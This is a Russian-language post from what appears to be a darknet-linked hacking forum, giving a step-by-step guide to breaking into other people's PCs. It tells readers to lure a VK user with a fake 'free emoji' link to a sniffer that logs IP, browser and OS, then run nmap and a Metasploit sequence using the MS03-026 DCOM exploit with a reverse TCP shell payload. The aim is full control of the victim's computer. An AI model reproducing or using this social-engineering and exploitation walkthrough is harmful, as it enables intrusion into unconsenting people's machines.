Актуально Взлом ПК

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Norisen

Участник

Norisen

Участник
10 Сен 2016
5
3
Всем привет, сегодня я расскажу о своём горьком опыте на KALI LINUX (2.0)
Итак мы будем узнавать максимум инфы о пользователе

Какая у него стоит OC
Какой браузер использует
И попытаемся зайти в компьютер ( Не всегда получается...)
У нас должен быть КАЛИ

Регаемся на сайте
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Ищем пользователя вк и говорим, 'Привет вот бесплатные смайлы вк и ссылку'

Когда пользователь перейдет по ссылочке у вас в сниффере выбьет о нём инфу... (IP,Browser,OS)

И потом нам уже потребуется Kali

  • Итак запускаем Kali
  • В нём запускаем Терминал
  • Начинаем
  • Пишем nmap ip(компа)
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • Вам выдаёт открытые порты это нам и нужно...
  • Теперь нажимаем ентер и смотрим какие нам выдаст порты ( В моём случает выбило 22,53,80)
  • Теперь нам нужен Metasploit
  • Вводим в консоль
    msfconsole
  • или
    msfvenom (Без разницы) Кстать он может долго запускаться...
  • Потом прописываем
  • msf > search dcom

  • Нам показан список вирусов из этой категории. Используем нужный при помощи команды use.
  • а вот и команда
    msf > use exploit/windows/dcerpc/ms03_026_dcom
  • Обратите внимание как все изменилось и теперь он отображает выбранный нами Exploit.

    Используйте эту команду чтобы увидеть опции которые используется при выбранном експлоите.
  • msf > show options
  • И тут начинается самое Интерестное
  • Взлом компуктера
  • ВВОДИМ
    msf > set RHOST (Ip адреес цели) Тот который мы сканировали
  • Теперь нужно посмотреть какие пайлоады доступны для этого експлоита. Для этого пишем
  • msf > show payloads
  • Теперь мы видим список и можем выбрать. Для этого пишем
  • msf > set PAYLOAD generic/shell_reverse_tcp
  • Теперь остался последний шаг. Мы должны сказать программе какой у нас Ip адрес. В случае успеха у нас будет полный контроль над компьютером цели.
  • msf > set LHOST 105.5.0.7(наш Ip)
  • Пора запускать все. Пишем:
    msf > exploit
  • чтобы убедится что вы действительно в системе пишем
    C:> DIR

  • УДАЧИ!
  • ССЫЛОЧКИ НА КАРТИНКИ ЕСЛИ ЧТО-То не понятно.
  • 1
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • 2
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • 3
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • 4
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • 5
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • 6
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • 7
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • 8
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • 9
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
 
Последнее редактирование модератором:

hey555

Участник

hey555

Участник
6 Фев 2017
5
0
Прикольно может пригодится для теста своего на проникновение, был бы благодарен если ест ь какие езе инструкции
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя